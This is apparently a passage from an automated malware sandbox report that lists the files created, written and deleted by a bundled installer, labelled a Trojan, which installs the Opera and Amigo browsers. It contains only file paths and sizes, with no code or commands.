%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Local State~RFa3603.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab1C.tmp (0 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Preferences~RF9f3ab.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar15.tmp (0 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\ssdfp1432.0.2065251784~RF92975.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2E.tmp (0 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Preferences~RFacb4e.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Preferences~RF9ceae.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar12.tmp (0 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Preferences~RFa7c82.TMP (0 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Preferences~RF9a50e.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab16.tmp (0 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Local State~RF9e023.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar1B.tmp (0 bytes)

The process installer.exe:1364 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Opera\Assets\150x150Logo.scale-80.png (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Opera.lnk (675 bytes)
%Program Files%\Opera\34.0.2036.41\localization\pt-BR.pak (673 bytes)
%Program Files%\Opera\Assets\150x150Logo.scale-180.png (7 bytes)
%Program Files%\Opera\Assets\150x150Logo.scale-140.png (5 bytes)
%Program Files%\Opera\34.0.2036.41\localization\zh-TW.pak (673 bytes)
%Program Files%\Opera\34.0.2036.41\wow_helper.exe (601 bytes)
%Program Files%\Opera\34.0.2036.41\resources\standard_themes\default_theme.zip (1281 bytes)
%Program Files%\Opera\34.0.2036.41\resources\standard_themes\landscape_photo.zip (1425 bytes)
%Program Files%\Opera\34.0.2036.41\resources\07593226-C5C5-438B-86BE-3F6361CD5B10.ico (1 bytes)
%Program Files%\Opera\34.0.2036.41\localization\ko.pak (673 bytes)
%Program Files%\Opera\Assets\150x150Logo.scale-100.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212501.log (124819 bytes)
%Program Files%\Opera\34.0.2036.41\localization\en-US.pak (601 bytes)
%Program Files%\Opera\34.0.2036.41\opera.dll (467066 bytes)
%Program Files%\Opera\Assets\70x70Logo.scale-80_contrast-white.png (1 bytes)
%Program Files%\Opera\34.0.2036.41\localization\fi.pak (673 bytes)
%Program Files%\Opera\Assets\70x70Logo.scale-180_contrast-white.png (2 bytes)
%Program Files%\Opera\34.0.2036.41\message_center_win8.dll (673 bytes)
%Program Files%\Opera\34.0.2036.41\localization\hr.pak (673 bytes)
%Program Files%\Opera\34.0.2036.41\libEGL.dll (601 bytes)
%Program Files%\Opera\34.0.2036.41\localization\ms.pak (673 bytes)
%Program Files%\Opera\34.0.2036.41\localization\vi.pak (673 bytes)
%Program Files%\Opera\34.0.2036.41\localization\mk.pak (1281 bytes)
%Program Files%\Opera\34.0.2036.41\localization\el.pak (1281 bytes)
%Program Files%\Opera\34.0.2036.41\localization\nb.pak (673 bytes)
%Program Files%\Opera\34.0.2036.41\localization\nn.pak (673 bytes)
%Program Files%\Opera\34.0.2036.41\osmesa.dll (22350 bytes)
%Program Files%\Opera\Resources.pri (3 bytes)
%Program Files%\Opera\34.0.2036.41\resources\4C95ADC1-5FD9-449D-BC75-77CA217403AE.ico (1 bytes)
%Program Files%\Opera\Assets\150x150Logo.scale-100_contrast-white.png (2 bytes)
%Program Files%\Opera\34.0.2036.41\localization\uk.pak (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Opera.lnk (675 bytes)
%Program Files%\Opera\34.0.2036.41\localization\sk.pak (673 bytes)
%Program Files%\Opera\34.0.2036.41\opera_crashreporter.exe (3073 bytes)
%Program Files%\Opera\34.0.2036.41\localization\te.pak (1425 bytes)
%Program Files%\Opera\Assets\70x70Logo.scale-100_contrast-white.png (1 bytes)
%Program Files%\Opera\34.0.2036.41\resources\standard_themes\reine.zip (53 bytes)
%Program Files%\Opera\34.0.2036.41\clearkeycdm.dll (8281 bytes)
%Program Files%\Opera\34.0.2036.41\localization\lt.pak (673 bytes)
%Program Files%\Opera\34.0.2036.41\resources\standard_themes\darkbreeze.zip (1281 bytes)
%Program Files%\Opera\34.0.2036.41\localization\en-GB.pak (601 bytes)
%Program Files%\Opera\34.0.2036.41\localization\ru.pak (1281 bytes)
%Program Files%\Opera\34.0.2036.41\resources\1AF2CDD0-8BF3-11E2-9E96-0800200C9A66.ico (1 bytes)
%Program Files%\Opera\34.0.2036.41\resources\013E742B-287B-4228-A0B9-BD617E4E02A4.ico (1 bytes)
%Program Files%\Opera\34.0.2036.41\resources\default_localized_themes.json (100 bytes)
%Program Files%\Opera\34.0.2036.41\localization\az.pak (673 bytes)
%Program Files%\Opera\34.0.2036.41\resources\F3F34CBB-24FF-4830-9E87-1663E7A0A5EE.ico (2 bytes)
%Program Files%\Opera\34.0.2036.41\resources\standard_themes\grey.zip (289 bytes)
%Program Files%\Opera\34.0.2036.41\snapshot_blob.bin (3073 bytes)
%Program Files%\Opera\34.0.2036.41\localization\ta.pak (2105 bytes)
%Program Files%\Opera\34.0.2036.41\resources\2F8F0E41-F521-45A4-9691-F664AFAFE67F.ico (17 bytes)
%Program Files%\Opera\34.0.2036.41\localization\th.pak (1425 bytes)
%Program Files%\Opera\34.0.2036.41\localization\uz.pak (1281 bytes)
%Program Files%\Opera\34.0.2036.41\resources\3BFDFA54-5DD6-4DFF-8B6C-C1715F306D6B.ico (4 bytes)
%Program Files%\Opera\34.0.2036.41\localization\fr.pak (673 bytes)
%Program Files%\Opera\34.0.2036.41\localization\ro.pak (673 bytes)
%Program Files%\Opera\34.0.2036.41\localization\zu.pak (673 bytes)
%Program Files%\Opera\34.0.2036.41\localization\bg.pak (1281 bytes)
%Program Files%\Opera\34.0.2036.41\resources\license.txt (18 bytes)
%Program Files%\Opera\Assets\70x70Logo.scale-80.png (1 bytes)
%Program Files%\Opera\34.0.2036.41\localization\hu.pak (673 bytes)
%Program Files%\Opera\34.0.2036.41\resources\3B6191A0-8BF3-11E2-9E96-0800200C9A66.ico (5 bytes)
%Program Files%\Opera\Assets\70x70Logo.scale-100.png (2 bytes)
%Program Files%\Opera\34.0.2036.41\msvcr100.dll (5441 bytes)
%Program Files%\Opera\34.0.2036.41\localization\gd.pak (673 bytes)
%Program Files%\Opera\34.0.2036.41\localization\me.pak (673 bytes)
%Program Files%\Opera\34.0.2036.41\d3dcompiler_47.dll (23811 bytes)
%Program Files%\Opera\34.0.2036.41\clearkeycdmadapter.dll (1281 bytes)
%Program Files%\Opera\34.0.2036.41\resources\0CD5F3A0-8BF6-11E2-9E96-0800200C9A66.ico (17 bytes)
%Program Files%\Opera\34.0.2036.41\opera_100_percent.pak (8281 bytes)
%Program Files%\Opera\34.0.2036.41\resources\F98D4D4C-8AA7-4619-A1E7-AC89B24558DD.ico (1 bytes)
%Program Files%\Opera\34.0.2036.41\localization\nl.pak (673 bytes)
%Program Files%\Opera\34.0.2036.41\opera_250_percent.pak (5873 bytes)
%Program Files%\Opera\34.0.2036.41\win8_importing.dll (601 bytes)
%Program Files%\Opera\34.0.2036.41\resources\dictionaries.xml (11 bytes)
%Program Files%\Opera\8.tmp (476 bytes)
%Program Files%\Opera\34.0.2036.41\resources\6D3582E1-6013-429F-BB34-C75B90CDD1F8.ico (1 bytes)
%Program Files%\Opera\34.0.2036.41\resources\2A3F5C20-8BF5-11E2-9E96-0800200C9A66.ico (6 bytes)
%Program Files%\Opera\34.0.2036.41\localization\be.pak (1281 bytes)
%Program Files%\Opera\34.0.2036.41\localization\pt-PT.pak (673 bytes)
%Program Files%\Opera\Assets\150x150Logo.scale-180_contrast-white.png (5 bytes)
%Program Files%\Opera\34.0.2036.41\localization\pl.pak (673 bytes)
%Program Files%\Opera\34.0.2036.41\localization\es-419.pak (673 bytes)
%Program Files%\Opera\Assets\150x150Logo.scale-80_contrast-white.png (1 bytes)
%Program Files%\Opera\34.0.2036.41\opera_autoupdate.licenses (14 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Opera.lnk (675 bytes)
%Program Files%\Opera\34.0.2036.41\localization\lv.pak (673 bytes)
%Program Files%\Opera\launcher.visualelementsmanifest.xml (317 bytes)
%Program Files%\Opera\installation_status.xml (10 bytes)
%Program Files%\Opera\34.0.2036.41\resources\66DD4BB6-A3BA-4B11-AF7A-F4BF23E073B2.ico (15 bytes)
%Program Files%\Opera\34.0.2036.41\opera_150_percent.pak (7547 bytes)
%Program Files%\Opera\34.0.2036.41\localization\hi.pak (1425 bytes)
%Program Files%\Opera\34.0.2036.41\localization\sv.pak (673 bytes)
%Program Files%\Opera\34.0.2036.41\localization\fil.pak (673 bytes)
%Program Files%\Opera\34.0.2036.41\localization\it.pak (673 bytes)
%Program Files%\Opera\Assets\70x70Logo.scale-140_contrast-white.png (1 bytes)
%Program Files%\Opera\34.0.2036.41\localization\cs.pak (673 bytes)
%Program Files%\Opera\34.0.2036.41\resources\CFCE84E5-9A95-4B3F-B8E4-3E98CF7EE6C5.ico (34 bytes)
%Program Files%\Opera\34.0.2036.41\localization\fy.pak (673 bytes)
%Program Files%\Opera\34.0.2036.41\resources\1CF37043-6733-479C-9086-7B21A2292DDA.ico (2 bytes)
%Program Files%\Opera\Assets\70x70Logo.scale-140.png (2 bytes)
%Program Files%\Opera\34.0.2036.41\resources\C665D993-1B49-4C2E-962C-BEB19993BB86.ico (17 bytes)
%Program Files%\Opera\server_tracking_data (641 bytes)
%Program Files%\Opera\34.0.2036.41\natives_blob.bin (2321 bytes)
%Program Files%\Opera\34.0.2036.41\localization\zh-CN.pak (601 bytes)
%Program Files%\Opera\34.0.2036.41\opera_autoupdate.exe (26831 bytes)
%Program Files%\Opera\34.0.2036.41\localization\kk.pak (1281 bytes)
%Program Files%\Opera\34.0.2036.41\resources\ab_tests.json (560 bytes)
%Program Files%\Opera\34.0.2036.41\mojo_public_test_support.dll (601 bytes)
%Program Files%\Opera\34.0.2036.41\localization\es.pak (673 bytes)
%WinDir%\Tasks\Opera scheduled Autoupdate 1450553101.job (386 bytes)
%Program Files%\Opera\launcher.exe (4545 bytes)
%Program Files%\Opera\34.0.2036.41\opera_125_percent.pak (7433 bytes)
%Program Files%\Opera\34.0.2036.41\localization\de.pak (673 bytes)
%Program Files%\Opera\34.0.2036.41\resources\AD2FD2BD-0727-4AF7-8917-AAED8627ED47.ico (1 bytes)
%Program Files%\Opera\Assets\150x150Logo.scale-140_contrast-white.png (3 bytes)
%Program Files%\Opera\34.0.2036.41\resources\5BBBDD5B-EDC7-4168-9F5D-290AF826E716.ico (1 bytes)
%Program Files%\Opera\34.0.2036.41\resources\FF57F01A-0718-44B7-8A1F-8B15BC33A50B.ico (5 bytes)
%Program Files%\Opera\34.0.2036.41\localization\tr.pak (673 bytes)
%Program Files%\Opera\34.0.2036.41\libGLESv2.dll (14988 bytes)
%Program Files%\Opera\34.0.2036.41\widevinecdmadapter.dll (1281 bytes)
%Program Files%\Opera\34.0.2036.41\localization\ca.pak (673 bytes)
%Program Files%\Opera\34.0.2036.41\resources\CFD4BE41-4C6D-496A-ADDB-4095DFA1DD0E.ico (5 bytes)
%Program Files%\Opera\34.0.2036.41\msvcp100.dll (2321 bytes)
%Program Files%\Opera\34.0.2036.41\localization\sr.pak (1281 bytes)
%Program Files%\Opera\34.0.2036.41\resources\8D754F20-8BF5-11E2-9E96-0800200C9A66.ico (6 bytes)
%Program Files%\Opera\34.0.2036.41\localization\sw.pak (673 bytes)
%Program Files%\Opera\Assets\notification_default.png (2 bytes)
%Program Files%\Opera\34.0.2036.41\resources\FFF3F819-B6CE-4DE6-B4E4-8E2618ABC0D9.ico (1 bytes)
%Program Files%\Opera\34.0.2036.41\resources\CCCED631-6DA2-4060-9824-95737E64350C.ico (17 bytes)
%Program Files%\Opera\34.0.2036.41\icudtl.dat (78553 bytes)
%Program Files%\Opera\34.0.2036.41\opera.pak (142858 bytes)
%Program Files%\Opera\34.0.2036.41\dbghelp.dll (7726 bytes)
%Program Files%\Opera\34.0.2036.41\localization\ja.pak (673 bytes)
%Program Files%\Opera\34.0.2036.41\localization\af.pak (673 bytes)
%Documents and Settings%\All Users\Desktop\Opera.lnk (675 bytes)
%Program Files%\Opera\34.0.2036.41\resources\76C397A8-9E8E-4706-8203-BD2878E9C618.ico (1 bytes)
%Program Files%\Opera\34.0.2036.41\resources\default_partner_content.json (1281 bytes)
%Program Files%\Opera\34.0.2036.41\resources\FDC2CCAB-E8F9-4620-91DD-B0B67285997C.ico (1 bytes)
%Program Files%\Opera\Assets\70x70Logo.scale-180.png (4 bytes)
%Program Files%\Opera\34.0.2036.41\localization\bn.pak (1425 bytes)
%Program Files%\Opera\34.0.2036.41\localization\da.pak (673 bytes)
%Program Files%\Opera\34.0.2036.41\localization\he.pak (673 bytes)
%Program Files%\Opera\34.0.2036.41\localization\fr-CA.pak (673 bytes)
%Program Files%\Opera\34.0.2036.41\installer.exe (8281 bytes)
%Program Files%\Opera\34.0.2036.41\opera_autoupdate.version (6 bytes)
%Program Files%\Opera\34.0.2036.41\resources\B478FE0C-0761-41C3-946F-CD1340356039.ico (1 bytes)
%Program Files%\Opera\34.0.2036.41\opera_200_percent.pak (10815 bytes)
%Program Files%\Opera\34.0.2036.41\localization\pa.pak (1425 bytes)
%Program Files%\Opera\34.0.2036.41\opera.exe (4185 bytes)
%Program Files%\Opera\34.0.2036.41\localization\id.pak (673 bytes)

The process amisetup9338__14991.exe:912 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\index[1].htm (2090 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\amipb[1].js (33981 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amisetup9338__14991.exe:typelib (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (113 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amitest.txt (15 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (0 bytes)

The process amisetup9364__14991.exe:1752 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (113 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amisetup9364__14991.exe:typelib (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amitest.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\index[1].htm (2090 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\index[1].htm (0 bytes)

The process amigo.exe:2536 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\User Data\31.tmp (934 bytes)

The process opera_autoupdate.exe:3736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Opera\1F.tmp (500 bytes)
%WinDir%\Temp\opera autoupdate\opera_autoupdate.log (215 bytes)

The Trojan deletes the following file(s):

%Program Files%\Opera\installer_prefs.json~RF939f0.TMP (0 bytes)

The process opera_autoupdate.exe:3572 makes changes in the file system.
The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\ssdfp1432.0.2065251784 (0 bytes)

The process launcher.exe:3612 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Temp\opera autoupdate\installer.exe (8281 bytes)

The Trojan deletes the following file(s):

%WinDir%\Temp\opera autoupdate\installer.exe (0 bytes)

The process setup.exe:2672 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\ro.pak (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\delegate_execute.exe (3707 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\fa.pak (1648 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\lt.pak (257 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\ar.pak (1629 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\natives_blob.bin (1677 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amigo_FFA3C3E0-B3B6-4D8C-928C-75AA59A806A0\UnityWebPlayer.exe (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Extensions\external_extensions.json (103 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\resources.pak (142877 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\cs.pak (258 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\gu.pak (1796 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\chrome_elf.dll (132 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\ml.pak (3735 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\ru.pak (1675 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\mm.exe (130 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Вконтакте.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\mm.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\te.pak (1863 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\libglesv2.dll (7972 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\it.pak (252 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Вконтакте.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\ta.pak (3682 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\amigo_resources.pak (28502 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Одноклассники.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\id.pak (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\ko.pak (263 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\vk.exe (167 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\snapshot_blob.bin (1717 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\44.4.2403.3.manifest (248 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\bn.pak (1830 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\es-419.pak (259 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\VisualElements\logo.png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\hr.pak (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\vk.exe (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\xinput1_3.dll (81 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\tr.pak (254 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\sv.pak (235 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\et.pak (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\chrome_installer.log (972 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\fi.pak (242 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\libegl.dll (81 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\hu.pak (272 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\chrome_child.dll (307964 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\icudtl.dat (75554 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\nl.pak (247 bytes)
%Documents and Settings%\%current user%\Desktop\Вконтакте.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\fil.pak (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\unitywebplayer.exe (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\chrome_200_percent.pak (7972 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\44.4.2403.3\Installer\setup.exe (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\ja.pak (308 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Интернет.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\ok.exe (142 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\sw.pak (236 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\pl.pak (253 bytes)
%Documents and Settings%\%current user%\Desktop\Интернет.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\nacl_irt_x86_32.nexe (17629 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\sl.pak (241 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Одноклассники.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amigo_FFA3C3E0-B3B6-4D8C-928C-75AA59A806A0\MailRuUpdater.exe (39945 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\ok.exe (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\pt-PT.pak (254 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\nacl64.exe (12289 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\es.pak (263 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\chrome.7z (1266233 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\bg.pak (1705 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\VisualElements\smalllogo.png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\amigo_cr.exe (1615 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\amigo.exe (3765 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\am.pak (1639 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\he.pak (296 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\libexif.dll (310 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\metro_driver.dll (1763 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\zh-TW.pak (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\PepperFlash\pepflashplayer.dll (122658 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\lv.pak (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\VisualElementsManifest.xml (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\mg.exe (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\zh-CN.pak (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\d3dcompiler_47.dll (22433 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\th.pak (1789 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\pt-BR.pak (249 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\wow_helper.exe (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\fr.pak (276 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\el.pak (1747 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\kn.pak (3669 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\vi.pak (287 bytes)
